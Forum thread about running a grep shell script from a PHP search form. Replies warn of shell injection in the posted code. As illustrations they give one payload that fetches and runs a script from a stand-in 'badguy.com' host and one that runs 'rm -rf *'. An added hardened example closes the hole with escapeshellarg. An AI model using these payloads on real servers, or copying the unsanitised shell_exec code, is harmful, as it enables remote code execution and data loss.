Solved Shell script executed in HTML/PHP

I have some basic knowledge of HTML/PHP. The situation I am facing is frustrating. What I want to accomplish is to create a simple search box on a web page: when the user puts in input and clicks submit, my shell script is executed and then presented on a PHP page. I have been successful in getting other commands to run when I click submit to make sure the PHP exec shell command is working. I will see the output on the web page. Just not my script. My script uses an argument to pass and works through the command line. Below are the details of my script, HTML, and PHP page. Also, I'm using a FreeBSD 10 box. Thanks for any help in advance.

My Script

Command Line -
$ csearch "argument"

Code:
#!/bin/sh
grep -ir -B 1 -A 4 "$*" /usr/local/var/rancid/CiscoDevices/configs

My HTML page

Code:
<html>
<body>
<form method="POST" action="csearch.php">
    <input type="text" name="searchText">
    <input type="submit" value="Search">
</form>
</body>
</html>

My PHP page

Code:
<?php
$searchText=$_POST['$searchText'];
?>

<html>
<?php

$output = shell_exec('/usr/local/bin/csearch $searchText');
echo "<pre>$output</pre>";

?>
</html>
 
I think your problem is this:
Code:
$searchText=$_POST['$searchText'];

should be:
Code:
$searchText=$_POST['searchText'];

And you might want the wrapper around the whole thing to be <html><body> ... </body></html> rather than just <html> ... </html>.
 
Right on! I can't believe I missed that. Thanks for the advice and help!
 
I hope you're not putting this up on the internet. The way the script is working right now opens it up to some very dangerous shellcode injection.
 
No, it's just on an internal LAN for a small purpose. What's the dangerous part? I'm a bit ignorant on scripting so please let me know.
 
It's a shell injection attack. Perhaps a search text like this could be used and result in running the attacker's script on your server.
Code:
searchtext_here; fetch http://www.badguy.com/evilscript.sh -o /tmp/evilscript.sh; sh /tmp/evilscript.sh
 
The problem is that you pass $searchText to a shell without quoting, escaping or otherwise sanitizing it. That means anyone can run arbitrary code on your server now, e.g. simply by passing the search text ; rm -rf * your script would execute rm -rf * after csearch.

You can make $searchText safer to use with e.g. http://php.net/manual/en/function.escapeshellarg.php

Also see the Wikipedia article on Code Injection: https://en.wikipedia.org/wiki/Code_injection#Shell_injection
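
Added example, not part of the thread: a hardened csearch.php that applies the escapeshellarg() advice above. It also rejects search text that the csearch script would hand to grep as an option and HTML-encodes the result. The field name and script path are the ones posted in the thread; PHP 7.1 or later, the 200-byte limit, the function names and the error message are assumptions of this example.

```php
<?php
// Added example, not the original poster's code.
const CSEARCH = '/usr/local/bin/csearch';   // path from the thread
const MAX_LEN = 200;                        // assumed limit for this example

// Return a usable search term, or null if the input must be rejected.
function validate_term($raw): ?string
{
    if (!is_string($raw)) return null;      // searchText[]=x arrives as an array
    $term = trim($raw);
    if ($term === '' || strlen($term) > MAX_LEN) return null;
    // csearch passes "$*" straight to grep with no "--" or -e, so a term
    // starting with '-' would be parsed by grep as an option.
    if ($term[0] === '-') return null;
    // Refuse NUL, newlines and other control characters.
    if (preg_match('/[\x00-\x1f\x7f]/', $term)) return null;
    return $term;
}

// Build the command line with the term as exactly one quoted argument.
function build_command(string $term): string
{
    // escapeshellarg() wraps the value in single quotes and escapes any
    // embedded single quote, so shell metacharacters such as ; stay literal
    // text inside the argument instead of starting a second command.
    return CSEARCH . ' ' . escapeshellarg($term);
}

$term = validate_term($_POST['searchText'] ?? null);
?>
<html>
<body>
<?php
if ($term === null) {
    echo "<p>Invalid search text.</p>";
} else {
    $output = shell_exec(build_command($term));
    // Matched config lines may contain < > &, so encode them before
    // placing them in the page.
    echo "<pre>" . htmlspecialchars((string)$output, ENT_QUOTES, 'UTF-8') . "</pre>";
}
?>
</body>
</html>
```

With this version the sample input from the earlier reply is searched for as one literal string. The term is still interpreted by grep as a regular expression, because the csearch script itself is unchanged.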
 
Oh I see. Okay. Well I will definitely see if I can get that to handle differently then. Thanks for prompting me on that. I'd never known!
 